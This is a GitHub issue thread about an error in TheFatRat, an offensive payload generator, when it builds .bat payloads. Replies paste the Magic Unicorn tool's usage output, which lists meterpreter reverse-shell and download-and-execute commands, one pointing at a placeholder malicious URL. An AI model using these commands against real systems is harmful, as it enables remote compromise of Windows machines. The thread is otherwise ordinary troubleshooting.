### ISSUE TITLE
Error while creating .bat payload 

### ISSUE THREAD

**Issue by FREEZE07** [screetsec/TheFatRat#466]
I'm able to create .exe payloads but not .bat.
Please find below the error which i get:

cat: powershell_attack.txt: No such file or directory
rm: cannot remove 'unicorn.rc': No such file or directory
mv: cannot stat 'powershell_attack.txt': No such file or directory

Please help.

**Comment by peterpt** [comment]
under a terminal and inside main fatrat folder run this command : 

python tools/trusted_2_6.py

and post here the output .

**Comment by FREEZE07** [comment]
Hi, thanks for the reply...posting the output below 

root@kali:/home/kali/TheFatRat# python tools/trusted_2_6.py

                                                         ,/
                                                        //
                                                      ,//
                                          ___   /|   |//
                                      `__/\_ --(/|___/-/
                                   \|\_-\___ __-_`- /-/ \.
                                  |\_-___,-\_____--/_)' ) \
                                   \ -_ /     __ \( `( __`\|
                                   `\__|      |\)\ ) /(/|
           ,._____.,            ',--//-|      \  |  '   /
          /     __. \,          / /,---|       \       /
         / /    _. \  \        `/`_/ _,'        |     |
        |  | ( (  \   |      ,/\'__/'/          |     |
        |  \  \`--, `_/_------______/           \(   )/
        | | \  \_. \,                            \___/\
        | |  \_   \  \                                 \
        \ \    \_ \   \   /                             \
         \ \  \._  \__ \_|       |                       \
          \ \___  \      \       |                        \
           \__ \__ \  \_ |       \                         |
           |  \_____ \  ____      |                        |
           | \  \__ ---' .__\     |        |               |
           \  \__ ---   /   )     |        \              /
            \   \____/ / ()(      \          `---_       /|
             \__________/(,--__    \_________.    |    ./ |
               |     \ \  `---_\--,           \   \_,./   |
               |      \  \_ ` \    /`---_______-\   \\    /
                \      \.___,`|   /              \   \\   \
                 \     |  \_ \|   \              (   |:    |
                  \    \      \    |             /  / |    ;
                   \    \      \    \          ( `_'   \  |
                    \.   \      \.   \          `__/   |  |
                      \   \       \.  \                |  |
                       \   \        \  \               (  )
                        \   |        \  |              |  |
                         |  \         \ \              I  `
                         ( __;        ( _;            ('-_';
                         |___\        \___:            \___:
                
-------------------- Magic Unicorn Attack Vector v2.6 -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec exe=test.exe url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro
HTA Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Help Menu: python unicorn.py --help

**Comment by FREEZE07** [comment]
> under a terminal and inside main fatrat folder run this command :
> 
> python tools/trusted_2_6.py
> 
> and post here the output .

Hi, please find below the output



root@kali:/home/kali/TheFatRat# python tools/trusted_2_6.py

                                                         ,/
                                                        //
                                                      ,//
                                          ___   /|   |//
                                      `__/\_ --(/|___/-/
                                   \|\_-\___ __-_`- /-/ \.
                                  |\_-___,-\_____--/_)' ) \
                                   \ -_ /     __ \( `( __`\|
                                   `\__|      |\)\ ) /(/|
           ,._____.,            ',--//-|      \  |  '   /
          /     __. \,          / /,---|       \       /
         / /    _. \  \        `/`_/ _,'        |     |
        |  | ( (  \   |      ,/\'__/'/          |     |
        |  \  \`--, `_/_------______/           \(   )/
        | | \  \_. \,                            \___/\
        | |  \_   \  \                                 \
        \ \    \_ \   \   /                             \
         \ \  \._  \__ \_|       |                       \
          \ \___  \      \       |                        \
           \__ \__ \  \_ |       \                         |
           |  \_____ \  ____      |                        |
           | \  \__ ---' .__\     |        |               |
           \  \__ ---   /   )     |        \              /
            \   \____/ / ()(      \          `---_       /|
             \__________/(,--__    \_________.    |    ./ |
               |     \ \  `---_\--,           \   \_,./   |
               |      \  \_ ` \    /`---_______-\   \\    /
                \      \.___,`|   /              \   \\   \
                 \     |  \_ \|   \              (   |:    |
                  \    \      \    |             /  / |    ;
                   \    \      \    \          ( `_'   \  |
                    \.   \      \.   \          `__/   |  |
                      \   \       \.  \                |  |
                       \   \        \  \               (  )
                        \   |        \  |              |  |
                         |  \         \ \              I  `
                         ( __;        ( _;            ('-_';
                         |___\        \___:            \___:
                
-------------------- Magic Unicorn Attack Vector v2.6 -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec exe=test.exe url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro
HTA Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Help Menu: python unicorn.py --help

**Comment by FREEZE07** [comment]
> > under a terminal and inside main fatrat folder run this command :
> > python tools/trusted_2_6.py
> > and post here the output .
> 
> Hi, please find below the output
> 
> root@kali:/home/kali/TheFatRat# python tools/trusted_2_6.py
> 
> ```
>                                                      ,/
>                                                     //
>                                                   ,//
>                                       ___   /|   |//
>                                   `__/\_ --(/|___/-/
>                                \|\_-\___ __-_`- /-/ \.
>                               |\_-___,-\_____--/_)' ) \
>                                \ -_ /     __ \( `( __`\|
>                                `\__|      |\)\ ) /(/|
>        ,._____.,            ',--//-|      \  |  '   /
>       /     __. \,          / /,---|       \       /
>      / /    _. \  \        `/`_/ _,'        |     |
>     |  | ( (  \   |      ,/\'__/'/          |     |
>     |  \  \`--, `_/_------______/           \(   )/
>     | | \  \_. \,                            \___/\
>     | |  \_   \  \                                 \
>     \ \    \_ \   \   /                             \
>      \ \  \._  \__ \_|       |                       \
>       \ \___  \      \       |                        \
>        \__ \__ \  \_ |       \                         |
>        |  \_____ \  ____      |                        |
>        | \  \__ ---' .__\     |        |               |
>        \  \__ ---   /   )     |        \              /
>         \   \____/ / ()(      \          `---_       /|
>          \__________/(,--__    \_________.    |    ./ |
>            |     \ \  `---_\--,           \   \_,./   |
>            |      \  \_ ` \    /`---_______-\   \\    /
>             \      \.___,`|   /              \   \\   \
>              \     |  \_ \|   \              (   |:    |
>               \    \      \    |             /  / |    ;
>                \    \      \    \          ( `_'   \  |
>                 \.   \      \.   \          `__/   |  |
>                   \   \       \.  \                |  |
>                    \   \        \  \               (  )
>                     \   |        \  |              |  |
>                      |  \         \ \              I  `
>                      ( __;        ( _;            ('-_';
>                      |___\        \___:            \___:
> ```
> 
> -------------------- Magic Unicorn Attack Vector v2.6 -----------------------------
> 
> Native x86 powershell injection attacks on any Windows platform.
> Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
> Twitter: @trustedsec, @HackingDave
> Credits: Matthew Graeber, Justin Elze, Chris Gates
> 
> Happy Magic Unicorns.
> 
> Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
> PS Example: python unicorn.py windows/meterpreter/reverse_tcp xxx.xxx.x.x xxx
> PS Down/Exec: python unicorn.py windows/download_exec exe=test.exe url=http://badurl.com/payload.exe
> Macro Example: python unicorn.py windows/meterpreter/reverse_tcp xxx.xxx.x.x xxx macro
> HTA Example: python unicorn.py windows/meterpreter/reverse_tcp xxx.xxx.x.x xxx hta
> CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
> Custom PS1 Example: python unicorn.py
> Custom PS1 Example: python unicorn.py macro 500
> Help Menu: python unicorn.py --help

I don't know how but it just worked right now.....? still please check if there was some issue

**Comment by peterpt** [comment]
if your local host ip is a domain then it will probably break the script ahead .
Use ips and not domains .

Next time post here the data you inserted in fatrat before the issue , just hide the 2 last octals of ip you are using .
example , instead posting your ip like this : 234.132.107.32  post it like this in your issue 234.132.xxx.xxx  so we know what data are you using in fatrat .

**Comment by re4per24** [comment]
i have the exact same problem..
I started fatrat and used option 1
then option 6
then it asks my inputs so i use my IP addy 10.0.x.xx on LPORT 8080, and named the file... then I get the error posted on this fourm ????

**Comment by dzxs** [comment]
me, `apt install python2` fixed this problem

**Comment by Juan-Montes** [comment]
Same problem I try to use option 1 of PwnWind with the bat and I get the error:

```
cat: powershell_attack.txt: The file or directory does not exist
rm: cannot delete 'unicorn.rc': The file or directory does not exist
mv: cannot perform `stat 'on' powershell_attack.txt ': The file or directory does not exist
```

I use Ips and not DNS for the reverse_tcp of the payload. I installed `gem install bundler` and it didn't work
